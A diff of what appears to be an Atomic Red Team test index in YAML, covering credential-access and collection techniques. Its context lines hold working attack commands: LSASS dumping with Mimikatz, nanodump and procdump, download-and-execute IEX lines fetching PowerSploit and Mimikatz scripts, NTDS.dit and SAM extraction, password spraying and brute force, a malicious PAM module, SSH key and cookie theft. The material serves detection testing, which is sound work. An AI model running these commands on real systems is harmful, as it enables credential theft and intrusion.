get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest "https://github.com/helpsystems/nanodump/raw/84db0c1737bbe027431733c193cfacf59a07259b/compiled/nanodump.x64.exe" -OutFile "$env:TEMP\nanodump.x64.exe"
executor:
command: '%temp%\nanodump.x64.exe -w "%temp%\nanodump.dmp"
-'
+ '
cleanup_command: 'del "%temp%\nanodump.dmp" >nul 2> nul
-'
+ '
name: command_prompt
elevation_required: true
- name: Dump LSASS.exe Memory using Windows Task Manager
@@ -3932,10 +3932,10 @@ credential-access:
dependencies:
- description: 'Mimikatz must exist on disk at specified location (#{mimikatz_exe})
-'
+ '
prereq_command: 'if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
$mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
@@ -3945,19 +3945,19 @@ credential-access:
Copy-Item $env:TEMP\Mimi\x64\mimikatz.exe #{mimikatz_exe} -Force
- description: 'Lsass dump must exist at specified location (#{input_file})
-'
+ '
prereq_command: 'cmd /c "if not exist #{input_file} (exit /b 1)"
-'
+ '
get_prereq_command: 'Write-Host "Create the lsass dump manually using the
steps in the previous test (Dump LSASS.exe Memory using Windows Task Manager)"
-'
+ '
executor:
command: '#{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords
full" exit
-'
+ '
name: command_prompt
elevation_required: true
- name: LSASS read with pypykatz
@@ -3974,35 +3974,35 @@ credential-access:
dependencies:
- description: 'Computer must have python 3 installed
-'
+ '
prereq_command: |
py -3 --version >nul 2>&1
exit /b %errorlevel%
get_prereq_command: 'echo "Python 3 must be installed manually"
-'
+ '
- description: 'Computer must have pip installed
-'
+ '
prereq_command: |
py -3 -m pip --version >nul 2>&1
exit /b %errorlevel%
get_prereq_command: 'echo "PIP must be installed manually"
-'
+ '
- description: 'pypykatz must be installed and part of PATH
-'
+ '
prereq_command: |
pypykatz -h >nul 2>&1
exit /b %errorlevel%
get_prereq_command: 'pip install pypykatz
-'
+ '
executor:
command: 'pypykatz live lsa
-'
+ '
name: command_prompt
elevation_required: true
- name: Dump LSASS.exe Memory using Out-Minidump.ps1
@@ -4019,7 +4019,7 @@ credential-access:
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); get-process lsass | Out-Minidump
cleanup_command: 'Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore
-'
+ '
name: powershell
elevation_required: true
- name: Create Mini Dump of LSASS.exe using ProcDump
@@ -4047,10 +4047,10 @@ credential-access:
- description: 'ProcDump tool from Sysinternals must exist on disk at specified
location (#{procdump_exe})
-'
+ '
prereq_command: 'if (Test-Path #{procdump_exe}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip"
Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force
@@ -4060,7 +4060,7 @@ credential-access:
command: "#{procdump_exe} -accepteula -mm lsass.exe #{output_file}\n"
cleanup_command: 'del "#{output_file}" >nul 2> nul
-'
+ '
name: command_prompt
elevation_required: true
- name: Powershell Mimikatz
@@ -4082,7 +4082,7 @@ credential-access:
command: 'IEX (New-Object Net.WebClient).DownloadString(''#{remote_script}'');
Invoke-Mimikatz -DumpCreds
-'
+ '
name: powershell
elevation_required: true
- name: Dump LSASS with .Net 5 createdump.exe
@@ -4104,15 +4104,15 @@ credential-access:
dependencies:
- description: 'Computer must have createdump.exe from .Net 5
-'
+ '
prereq_command: 'if (Test-Path ''#{createdump_exe}'') {exit 0} else {exit
1}
-'
+ '
get_prereq_command: 'echo ".NET 5 must be installed manually." "For the very
brave a copy of the executable can be found here: https://github.com/Scoubi/RedTeam-Tools/blob/main/createdump.exe"
-'
+ '
executor:
command: |
echo "Createdump Path #{createdump_exe}"
@@ -4122,7 +4122,7 @@ credential-access:
& "#{createdump_exe}" -u -f #{output_file} $ID
cleanup_command: 'Remove-Item #{output_file} -ErrorAction Ignore
-'
+ '
name: powershell
elevation_required: true
- name: Dump LSASS.exe using imported Microsoft DLLs
@@ -4147,10 +4147,10 @@ credential-access:
dependencies:
- description: 'Computer must have xordump.exe
-'
+ '
prereq_command: 'if (Test-Path ''#{xordump_exe}'') {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" -OutFile #{xordump_exe}
@@ -4158,7 +4158,7 @@ credential-access:
command: "#{xordump_exe} -out #{output_file} -x 0x41\n"
cleanup_command: 'Remove-Item #{output_file} -ErrorAction Ignore
-'
+ '
name: powershell
elevation_required: true
T1556:
@@ -4315,19 +4315,19 @@ credential-access:
dependencies:
- description: 'Target must be a Domain Controller
-'
+ '
prereq_command: 'reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v
ProductType | findstr LanmanNT
-'
+ '
get_prereq_command: 'echo Sorry, Promoting this machine to a Domain Controller
must be done manually
-'
+ '
executor:
command: 'vssadmin.exe create shadow /for=#{drive_letter}
-'
+ '
name: command_prompt
elevation_required: true
- name: Copy NTDS.dit from Volume Shadow Copy
@@ -4354,34 +4354,34 @@ credential-access:
dependencies:
- description: 'Target must be a Domain Controller
-'
+ '
prereq_command: 'reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v
ProductType | findstr LanmanNT
-'
+ '
get_prereq_command: 'echo Sorry, Promoting this machine to a Domain Controller
must be done manually
-'
+ '
- description: 'Volume shadow copy must exist
-'
+ '
prereq_command: 'if not exist #{vsc_name} (exit /b 1)
-'
+ '
get_prereq_command: 'echo Run "Invoke-AtomicTest T1003.003 -TestName ''Create
Volume Shadow Copy with vssadmin''" to fulfill this requirement
-'
+ '
- description: 'Extract path must exist
-'
+ '
prereq_command: 'if not exist #{extract_path} (exit /b 1)
-'
+ '
get_prereq_command: 'mkdir #{extract_path}
-'
+ '
executor:
command: |
copy #{vsc_name}\Windows\NTDS\NTDS.dit #{extract_path}\ntds.dit
@@ -4413,22 +4413,22 @@ credential-access:
dependencies:
- description: 'Target must be a Domain Controller
-'
+ '
prereq_command: 'reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v
ProductType | findstr LanmanNT
-'
+ '
get_prereq_command: 'echo Sorry, Promoting this machine to a Domain Controller
must be done manually
-'
+ '
executor:
command: |
mkdir #{output_folder}
ntdsutil "ac i ntds" "ifm" "create full #{output_folder}" q q
cleanup_command: 'rmdir /q /s #{output_folder} >nul 2>&1
-'
+ '
name: command_prompt
elevation_required: true
- name: Create Volume Shadow Copy with WMI
@@ -4447,19 +4447,19 @@ credential-access:
dependencies:
- description: 'Target must be a Domain Controller
-'
+ '
prereq_command: 'reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v
ProductType | findstr LanmanNT
-'
+ '
get_prereq_command: 'echo Sorry, Promoting this machine to a Domain Controller
must be done manually
-'
+ '
executor:
command: 'wmic shadowcopy call create Volume=#{drive_letter}
-'
+ '
name: command_prompt
elevation_required: true
- name: Create Volume Shadow Copy remotely with WMI
@@ -4482,18 +4482,18 @@ credential-access:
- description: 'Target must be a reachable Domain Controller, and current context
must be domain admin
-'
+ '
prereq_command: 'wmic /node:"#{target_host}" shadowcopy list brief
-'
+ '
get_prereq_command: 'echo Sorry, can''t connect to target host, check: network,
firewall or permissions (must be admin on target)
-'
+ '
executor:
command: 'wmic /node:"#{target_host}" shadowcopy call create Volume=#{drive_letter}
-'
+ '
name: command_prompt
elevation_required: true
- name: Create Volume Shadow Copy remotely (WMI) with esentutl
@@ -4520,19 +4520,19 @@ credential-access:
- description: 'Target must be a reachable Domain Controller, and current context
must be domain admin
-'
+ '
prereq_command: 'wmic /node:"#{target_host}" shadowcopy list brief
-'
+ '
get_prereq_command: 'echo Sorry, can''t connect to target host, check: network,
firewall or permissions (must be admin on target)
-'
+ '
executor:
command: 'wmic /node:"#{target_host}" process call create "cmd.exe /c esentutl.exe
/y /vss #{source_path} /d #{target_path}"
-'
+ '
name: command_prompt
elevation_required: true
- name: Create Volume Shadow Copy with Powershell
@@ -4696,11 +4696,11 @@ credential-access:
dependencies:
- description: 'Check if at least one of tcpdump or tshark is installed.
-'
+ '
prereq_command: 'if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command
-v tshark)" ]; then exit 1; else exit 0; fi;
-'
+ '
get_prereq_command: "(which yum && yum -y install epel-release tcpdump tshark)||(which
apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y tcpdump tshark)\n"
executor:
@@ -4726,11 +4726,11 @@ credential-access:
dependencies:
- description: 'Check if at least one of tcpdump or tshark is installed.
-'
+ '
prereq_command: 'if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command
-v tshark)" ]; then exit 1; else exit 0; fi;
-'
+ '
get_prereq_command: "(which yum && yum -y install epel-release tcpdump tshark)||(which
apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y tcpdump tshark)\n"
executor:
@@ -4773,14 +4773,14 @@ credential-access:
- description: 'tshark must be installed and in the default path of "c:\Program
Files\Wireshark\Tshark.exe".
-'
+ '
prereq_command: if (test-path "#{tshark_path}") {exit 0} else {exit 1}
get_prereq_command: |
Invoke-WebRequest -OutFile $env:temp\wireshark_installer.exe #{wireshark_url}
Start-Process $env:temp\wireshark_installer.exe /S
- description: 'npcap must be installed.
-'
+ '
prereq_command: if (test-path "#{npcap_path}") {exit 0} else {exit 1}
get_prereq_command: |
Invoke-WebRequest -OutFile $env:temp\npcap_installer.exe #{npcap_url}
@@ -4788,7 +4788,7 @@ credential-access:
executor:
command: '"c:\Program Files\Wireshark\tshark.exe" -i #{interface} -c 5
-'
+ '
name: command_prompt
elevation_required: true
- name: Windows Internal Packet Capture
@@ -4955,10 +4955,10 @@ credential-access:
dependencies:
- description: 'Gsecdump must exist on disk at specified location (#{gsecdump_exe})
-'
+ '
prereq_command: 'if (Test-Path #{gsecdump_exe}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
$parentpath = Split-Path "#{gsecdump_exe}"; $binpath = "$parentpath\gsecdump-v2b5.exe"
@@ -5023,7 +5023,7 @@ credential-access:
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump $id $env:TEMP\svchost-exe.dmp full
cleanup_command: 'Remove-Item $env:TEMP\svchost-exe.dmp -ErrorAction Ignore
-'
+ '
name: powershell
elevation_required: true
T1110.002:
@@ -5191,7 +5191,7 @@ credential-access:
description: 'Uses PowerShell to install and register a password filter DLL.
Requires a reboot and administrative privileges.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -5204,14 +5204,14 @@ credential-access:
- description: 'AtomicPasswordFilter.dll must exist on disk at specified location
(#{input_dll})
-'
+ '
prereq_command: 'if (Test-Path #{input_dll}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Write-Host "You must provide your own password filter
dll"
-'
+ '
executor:
command: |
$passwordFilterName = (Copy-Item "#{input_dll}" -Destination "C:\Windows\System32" -PassThru).basename
@@ -5303,7 +5303,7 @@ credential-access:
description: 'Attempts to brute force a single Active Directory account by testing
connectivity to the IPC$ share on a domain controller
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -5326,7 +5326,7 @@ credential-access:
description: 'Attempt to brute force Active Directory domain user on a domain
controller, via LDAP, with NTLM or Kerberos
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -5376,7 +5376,7 @@ credential-access:
auto_generated_guid: 5a51ef57-299e-4d62-8e11-2d440df55e69
description: 'Attempt to brute force Azure AD user via AzureAD powershell module.
-'
+ '
supported_platforms:
- azure-ad
input_arguments:
@@ -5393,14 +5393,14 @@ credential-access:
dependencies:
- description: 'AzureAD module must be installed.
-'
+ '
prereq_command: 'try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue)
{exit 0} else {exit 1}} catch {exit 1}
-'
+ '
get_prereq_command: 'Install-Module -Name AzureAD -Force
-'
+ '
executor:
name: powershell
elevation_required: false
@@ -5432,7 +5432,7 @@ credential-access:
dependencies:
- description: 'Check if running on a Debian based machine.
-'
+ '
prereq_command: |
if grep -iq "debian\|ubuntu\|kali" /usr/lib/os-release; then echo "Debian"; else echo "NOT Debian"; exit 1; fi
if grep -Rq "pam_tally" /etc/pam.d/*; then echo "pam_tally configured"; exit 1; fi
@@ -5440,7 +5440,7 @@ credential-access:
if [ -x "$(command -v openssl)" ]; then echo "openssl installed"; else echo "install openssl"; fi
get_prereq_command: 'apt-get update && apt-get install -y openssl sudo
-'
+ '
executor:
elevation_required: true
command: |
@@ -5463,7 +5463,7 @@ credential-access:
rm /tmp/file
cleanup_command: 'userdel target
-'
+ '
name: sh
- name: SUDO brute force Redhat
auto_generated_guid: b72958a7-53e3-4809-9ee1-58f6ecd99ade
@@ -5475,7 +5475,7 @@ credential-access:
dependencies:
- description: 'Check if running on a Redhat based machine.
-'
+ '
prereq_command: |
if grep -iq "rhel\|fedora\|centos" /usr/lib/os-release; then echo "Redhat"; else echo "NOT Redhat"; exit 1; fi
if grep -Rq "pam_faillock" /etc/pam.d/*; then echo "pam_faillock configured"; exit 1; fi
@@ -5483,7 +5483,7 @@ credential-access:
if [ -x "$(command -v openssl)" ]; then echo "openssl installed"; else echo "install openssl"; fi
get_prereq_command: 'yum -y update && yum install -y openssl sudo
-'
+ '
executor:
elevation_required: true
command: |
@@ -5506,7 +5506,7 @@ credential-access:
rm /tmp/file
cleanup_command: 'userdel target
-'
+ '
name: sh
T1555.005:
technique:
@@ -5672,13 +5672,13 @@ credential-access:
dependencies:
- description: 'List of domain users to password spray must exits at %temp%\users.txt
-'
+ '
prereq_command: 'if not exist %temp%\users.txt (exit /b 1)
-'
+ '
get_prereq_command: 'PathToAtomicsFolder\T1110.003\src\parse_net_users.bat
-'
+ '
executor:
name: command_prompt
elevation_required: false
@@ -5686,7 +5686,7 @@ credential-access:
/user:"%userdomain%\%n" "#{password}" 1>NUL 2>&1 && @echo [*] %n:#{password}
&& @net use /delete %logonserver%\IPC$ > NUL
-'
+ '
- name: Password Spray (DomainPasswordSpray)
auto_generated_guid: 263ae743-515f-4786-ac7d-41ef3a0d4b2b
description: |
@@ -5785,14 +5785,14 @@ credential-access:
dependencies:
- description: 'AzureAD module must be installed.
-'
+ '
prereq_command: 'try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue)
{exit 0} else {exit 1}} catch {exit 1}
-'
+ '
get_prereq_command: 'Install-Module -Name AzureAD -Force
-'
+ '
executor:
name: powershell
elevation_required: false
@@ -5912,10 +5912,10 @@ credential-access:
elevation_required: true
command: 'sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf}
-'
+ '
cleanup_command: 'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf}
-'
+ '
- name: Malicious PAM module
auto_generated_guid: 65208808-3125-4a2e-8389-a0a00e9ab326
description: |
@@ -5949,35 +5949,35 @@ credential-access:
- description: 'The PAM development library must be installed to build the PAM
module
-'
+ '
prereq_command: 'if [ -f /usr/include/security/pam_modules.h ]; then exit
0; else exit 1; fi;
-'
+ '
get_prereq_command: 'if [ -n "`which apt-get`" ]; then sudo apt-get -y install
libpam0g-dev; elif [ -n "`which yum`" ]; then sudo yum -y install pam-devel;
fi
-'
+ '
- description: 'The PAM module must exist on disk at specified location (#{path_to_pam_module})
-'
+ '
prereq_command: 'if [ -f #{path_to_pam_module} ]; then exit 0; else exit 1;
fi;
-'
+ '
get_prereq_command: 'sudo gcc -shared -fPIC -o #{path_to_pam_module} #{path_to_pam_module_source}
-'
+ '
executor:
name: sh
elevation_required: true
command: 'sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf}
-'
+ '
cleanup_command: 'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf}
-'
+ '
T1552.004:
technique:
object_marking_refs:
@@ -6052,14 +6052,14 @@ credential-access:
executor:
command: 'dir c:\ /b /s .key | findstr /e .key
-'
+ '
name: command_prompt
elevation_required: true
- name: Discover Private SSH Keys
auto_generated_guid: 46959285-906d-40fa-9437-5a439accd878
description: 'Discover private SSH keys on a macOS or Linux system.
-'
+ '
supported_platforms:
- macos
- linux
@@ -6075,17 +6075,17 @@ credential-access:
executor:
command: 'find #{search_path} -name id_rsa >> #{output_file}
-'
+ '
cleanup_command: 'rm #{output_file}
-'
+ '
name: sh
- name: Copy Private SSH Keys with CP
auto_generated_guid: 7c247dc7-5128-4643-907b-73a76d9135c3
description: 'Copy private SSH keys on a Linux system to a staging folder using
the `cp` command.
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -6103,14 +6103,14 @@ credential-access:
find #{search_path} -name id_rsa -exec cp --parents {} #{output_folder} \;
cleanup_command: 'rm #{output_folder}
-'
+ '
name: sh
- name: Copy Private SSH Keys with rsync
auto_generated_guid: 864bb0b2-6bb5-489a-b43b-a77b3a16d68a
description: 'Copy private SSH keys on a Linux or macOS system to a staging
folder using the `rsync` command.
-'
+ '
supported_platforms:
- macos
- linux
@@ -6129,14 +6129,14 @@ credential-access:
find #{search_path} -name id_rsa -exec rsync -R {} #{output_folder} \;
cleanup_command: 'rm -rf #{output_folder}
-'
+ '
name: sh
- name: Copy the users GnuPG directory with rsync
auto_generated_guid: 2a5a0601-f5fb-4e2e-aa09-73282ae6afca
description: 'Copy the users GnuPG (.gnupg) directory on a Mac or Linux system
to a staging folder using the `rsync` command.
-'
+ '
supported_platforms:
- macos
- linux
@@ -6155,7 +6155,7 @@ credential-access:
find #{search_path} -type d -name '.gnupg' -exec rsync -Rr {} #{output_folder} \;
cleanup_command: 'rm -rf #{output_folder}
-'
+ '
name: sh
- name: ADFS token signing and encryption certificates theft - Local
auto_generated_guid: 78e95057-d429-4e66-8f82-0f060c1ac96f
@@ -6168,13 +6168,13 @@ credential-access:
dependencies:
- description: 'AADInternals module must be installed.
-'
+ '
prereq_command: 'if (Get-Module AADInternals) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Install-Module -Name AADInternals -Force
-'
+ '
executor:
command: |
Import-Module AADInternals -Force
@@ -6214,14 +6214,14 @@ credential-access:
dependencies:
- description: 'AADInternals and ActiveDirectory modules must be installed.
-'
+ '
prereq_command: 'if ($(Get-Module AADInternals) -or $(Get-Module -ListAvailable
-Name ActiveDirectory)) {echo 0} else {echo 1}
-'
+ '
get_prereq_command: 'Install-Module -Name AADInternals -Force
-'
+ '
executor:
command: "Import-Module ActiveDirectory -Force \nImport-Module AADInternals
-Force | Out-Null\n#Get Configuration\n$dcServerName = (Get-ADDomainController).HostName\n$svc
@@ -6316,7 +6316,7 @@ credential-access:
dependencies:
- description: 'Script to launch target process must exist
-'
+ '
prereq_command: |
test -f #{script_path}
grep "#{pid_term}" #{script_path}
@@ -6337,7 +6337,7 @@ credential-access:
grep -i "PASS" "#{output_file}"
cleanup_command: 'rm -f "#{output_file}"
-'
+ '
- name: Dump individual process memory with Python (Local)
auto_generated_guid: 437b2003-a20d-4ed8-834c-4964f24eec63
description: |
@@ -6365,7 +6365,7 @@ credential-access:
dependencies:
- description: 'Script to launch target process must exist
-'
+ '
prereq_command: |
test -f #{script_path}
grep "#{pid_term}" #{script_path}
@@ -6374,11 +6374,11 @@ credential-access:
echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path}
- description: 'Requires Python
-'
+ '
prereq_command: "(which python || which python3 || which python2)\n"
get_prereq_command: 'echo "Python 2.7+ or 3.4+ must be installed"
-'
+ '
executor:
name: sh
elevation_required: true
@@ -6390,7 +6390,7 @@ credential-access:
grep -i "PASS" "#{output_file}"
cleanup_command: 'rm -f "#{output_file}"
-'
+ '
- name: Capture Passwords with MimiPenguin
auto_generated_guid: a27418de-bdce-4ebd-b655-38f04842bf0c
description: "MimiPenguin is a tool inspired by MimiKatz that targets Linux
@@ -6414,40 +6414,40 @@ credential-access:
- description: 'MimiPenguin script must exist on disk at specified location
(#{MimiPenguin_Location})
-'
+ '
prereq_command: 'if [ -f "#{MimiPenguin_Location}" ]; then exit 0; else exit
1; fi;
-'
+ '
get_prereq_command: |
wget -O "/tmp/mimipenguin.tar.gz" https://github.com/huntergregal/mimipenguin/releases/download/2.0-release/mimipenguin_2.0-release.tar.gz
mkdir /tmp/mimipenguin
tar -xzvf "/tmp/mimipenguin.tar.gz" -C /tmp/mimipenguin
- description: 'Strings must be installed
-'
+ '
prereq_command: 'if [ -x "$(command -v strings --version)" ]; then exit 0;
else exit 1; fi;
-'
+ '
get_prereq_command: 'sudo apt-get -y install binutils
-'
+ '
- description: 'Python2 must be installed
-'
+ '
prereq_command: 'if [ -x "$(command -v python2 --version)" ]; then exit 0;
else exit 1; fi;
-'
+ '
get_prereq_command: "sudo apt-get -y install python2 \n"
- description: 'Libc-bin must be installed
-'
+ '
prereq_command: 'if [ -x "$(command -v ldd --version)" ]; then exit 0; else
exit 1; fi;
-'
+ '
get_prereq_command: "sudo apt-get -y install libc-bin \n"
executor:
command: |
@@ -6455,7 +6455,7 @@ credential-access:
cat #{output_file}
cleanup_command: 'rm -f #{output_file} > /dev/null
-'
+ '
name: bash
elevation_required: true
T1606.002:
@@ -6554,13 +6554,13 @@ credential-access:
dependencies:
- description: 'AADInternals module must be installed.
-'
+ '
prereq_command: 'if (Get-Module AADInternals) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Install-Module -Name AADInternals -Force
-'
+ '
executor:
command: |
Import-Module AADInternals -Force
@@ -6648,42 +6648,42 @@ credential-access:
auto_generated_guid: a96872b2-cbf3-46cf-8eb4-27e8c0e85263
description: 'Parses registry hives to obtain stored credentials
-'
+ '
supported_platforms:
- windows
dependency_executor_name: command_prompt
dependencies:
- description: 'Computer must have python 3 installed
-'
+ '
prereq_command: |
py -3 --version >nul 2>&1
exit /b %errorlevel%
get_prereq_command: 'echo "Python 3 must be installed manually"
-'
+ '
- description: 'Computer must have pip installed
-'
+ '
prereq_command: |
py -3 -m pip --version >nul 2>&1
exit /b %errorlevel%
get_prereq_command: 'echo "PIP must be installed manually"
-'
+ '
- description: 'pypykatz must be installed and part of PATH
-'
+ '
prereq_command: |
pypykatz -h >nul 2>&1
exit /b %errorlevel%
get_prereq_command: 'pip install pypykatz
-'
+ '
executor:
command: 'pypykatz live registry
-'
+ '
name: command_prompt
elevation_required: true
- name: esentutl.exe SAM copy
@@ -6709,12 +6709,12 @@ credential-access:
executor:
command: 'esentutl.exe /y /vss #{file_path} /d #{copy_dest}/#{file_name}
-'
+ '
name: command_prompt
elevation_required: true
cleanup_command: 'del #{copy_dest}\#{file_name} >nul 2>&1
-'
+ '
- name: PowerDump Hashes and Usernames from Registry
auto_generated_guid: 804f28fc-68fc-40da-b5a2-e9d0bce5c193
description: Executes a hashdump by reading the hashes from the registry.
@@ -6770,7 +6770,7 @@ credential-access:
auto_generated_guid: 9d77fed7-05f8-476e-a81b-8ff0472c64d0
description: 'Dump hives from volume shadow copies with System.IO.File
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -7086,10 +7086,10 @@ credential-access:
dependencies:
- description: 'Sqlite3 must exist at (#{sqlite3_path})
-'
+ '
prereq_command: 'if (Test-Path #{sqlite3_path}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
Invoke-WebRequest "https://www.sqlite.org/2022/sqlite-tools-win32-x86-3380200.zip" -OutFile "$env:temp\sqlite.zip"
Expand-Archive -path "$env:temp\sqlite.zip" -destinationpath "$env:temp\" -force
@@ -7100,7 +7100,7 @@ credential-access:
"select host, name, value, path, expiry, isSecure, isHttpOnly, sameSite from [moz_cookies];" | cmd /c #{sqlite3_path} "$CookieDBLocation" | out-file -filepath "#{output_file}"
cleanup_command: 'remove-item #{output_file} -erroraction silentlycontinue
-'
+ '
name: powershell
elevation_required: false
T1558:
@@ -7552,7 +7552,7 @@ credential-access:
elevation_required: false
command: 'vaultcmd /listcreds:"Windows Credentials"
-'
+ '
collection:
T1557.002:
technique:
@@ -7729,7 +7729,7 @@ collection:
elevation_required: false
command: 'dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file}
-'
+ '
cleanup_command: 'Remove-Item -path #{output_file} -ErrorAction Ignore'
T1560.003:
technique:
@@ -7825,7 +7825,7 @@ collection:
auto_generated_guid: 391f5298-b12d-4636-8482-35d9c17d53a8
description: 'Uses GZip from Python to compress files
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -7841,10 +7841,10 @@ collection:
dependencies:
- description: 'Requires Python
-'
+ '
prereq_command: 'which_python=`which python`; $which_python -V
-'
+ '
get_prereq_command: ''
executor:
name: bash
@@ -7852,15 +7852,15 @@ collection:
command: '$which_python -c "import gzip;input_file=open(''#{path_to_input_file}'',
''rb'');content=input_file.read();input_file.close();output_file=gzip.GzipFile(''#{path_to_output_file}'',''wb'',''compresslevel=6'');output_file.write(content);output_file.close();"
-'
+ '
cleanup_command: 'rm #{path_to_output_file}
-'
+ '
- name: Compressing data using bz2 in Python (Linux)
auto_generated_guid: c75612b2-9de0-4d7c-879c-10d7b077072d
description: 'Uses bz2 from Python to compress files
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -7876,25 +7876,25 @@ collection:
dependencies:
- description: 'Requires Python
-'
+ '
prereq_command: 'which_python=`which python`; $which_python -V
-'
+ '
get_prereq_command: ''
executor:
name: bash
elevation_required: false
command: '$which_python -c "import bz2;input_file=open(''#{path_to_input_file}'',''rb'');content=input_file.read();input_file.close();bz2content=bz2.compress(content,compresslevel=9);output_file=open(''#{path_to_output_file}'',''w+'');output_file.write(bz2content);output_file.close();"
-'
+ '
cleanup_command: 'rm #{path_to_output_file}
-'
+ '
- name: Compressing data using zipfile in Python (Linux)
auto_generated_guid: 001a042b-859f-44d9-bf81-fd1c4e2200b0
description: 'Uses zipfile from Python to compress files
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -7910,10 +7910,10 @@ collection:
dependencies:
- description: 'Requires Python
-'
+ '
prereq_command: 'which_python=`which python`; $which_python -V
-'
+ '
get_prereq_command: ''
executor:
name: bash
@@ -7921,15 +7921,15 @@ collection:
command: '$which_python -c "from zipfile import ZipFile; ZipFile(''#{path_to_output_file}'',
mode=''w'').write(''#{path_to_input_file}'')"
-'
+ '
cleanup_command: 'rm #{path_to_output_file}
-'
+ '
- name: Compressing data using tarfile in Python (Linux)
auto_generated_guid: e86f1b4b-fcc1-4a2a-ae10-b49da01458db
description: 'Uses tarfile from Python to compress files
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -7945,10 +7945,10 @@ collection:
dependencies:
- description: 'Requires Python
-'
+ '
prereq_command: 'which_python=`which python`; $which_python -V
-'
+ '
get_prereq_command: ''
executor:
name: bash
@@ -7957,7 +7957,7 @@ collection:
mode='w').write('#{path_to_input_file}')\" \n"
cleanup_command: 'rm #{path_to_output_file}
-'
+ '
T1560.001:
technique:
type: attack-pattern
@@ -8040,10 +8040,10 @@ collection:
dependencies:
- description: 'Rar tool must be installed at specified location (#{rar_exe})
-'
+ '
prereq_command: 'if not exist "#{rar_exe}" (exit /b 1)
-'
+ '
get_prereq_command: |
echo Downloading Winrar installer
bitsadmin /transfer myDownloadJob /download /priority normal "https://www.win-rar.com/fileadmin/winrar-versions/winrar/th/winrar-x64-580.exe" #{rar_installer}
@@ -8053,10 +8053,10 @@ collection:
elevation_required: false
command: '"#{rar_exe}" a -r #{output_file} #{input_path}\*#{file_extension}
-'
+ '
cleanup_command: 'del /f /q /s #{output_file} >nul 2>&1
-'
+ '
- name: Compress Data and lock with password for Exfiltration with winrar
auto_generated_guid: 8dd61a55-44c6-43cc-af0c-8bdda276860c
description: |
@@ -8076,10 +8076,10 @@ collection:
dependencies:
- description: 'Rar tool must be installed at specified location (#{rar_exe})
-'
+ '
prereq_command: 'if not exist "#{rar_exe}" (exit /b 1)
-'
+ '
get_prereq_command: |
echo Downloading Winrar installer
bitsadmin /transfer myDownloadJob /download /priority normal "https://www.win-rar.com/fileadmin/winrar-versions/winrar/th/winrar-x64-580.exe" #{rar_installer}
@@ -8117,11 +8117,11 @@ collection:
dependencies:
- description: 'Winzip must be installed
-'
+ '
prereq_command: 'cmd /c ''if not exist "#{winzip_exe}" (echo 1) else (echo
0)''
-'
+ '
get_prereq_command: |
if(Invoke-WebRequestVerifyHash "#{winzip_url}" "$env:Temp\winzip.exe" #{winzip_hash}){
Write-Host Follow the installation prompts to continue
@@ -8141,7 +8141,7 @@ collection:
auto_generated_guid: d1334303-59cb-4a03-8313-b3e24d02c198
description: 'Note: Requires 7zip installation
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -8156,10 +8156,10 @@ collection:
dependencies:
- description: '7zip tool must be installed at specified location (#{7zip_exe})
-'
+ '
prereq_command: 'if not exist "#{7zip_exe}" (exit /b 1)
-'
+ '
get_prereq_command: |
echo Downloading 7-zip installer
bitsadmin /transfer myDownloadJob /download /priority normal "https://www.7-zip.org/a/7z2002-x64.exe" #{7zip_installer}
@@ -8178,7 +8178,7 @@ collection:
description: 'An adversary may compress data (e.g., sensitive documents) that
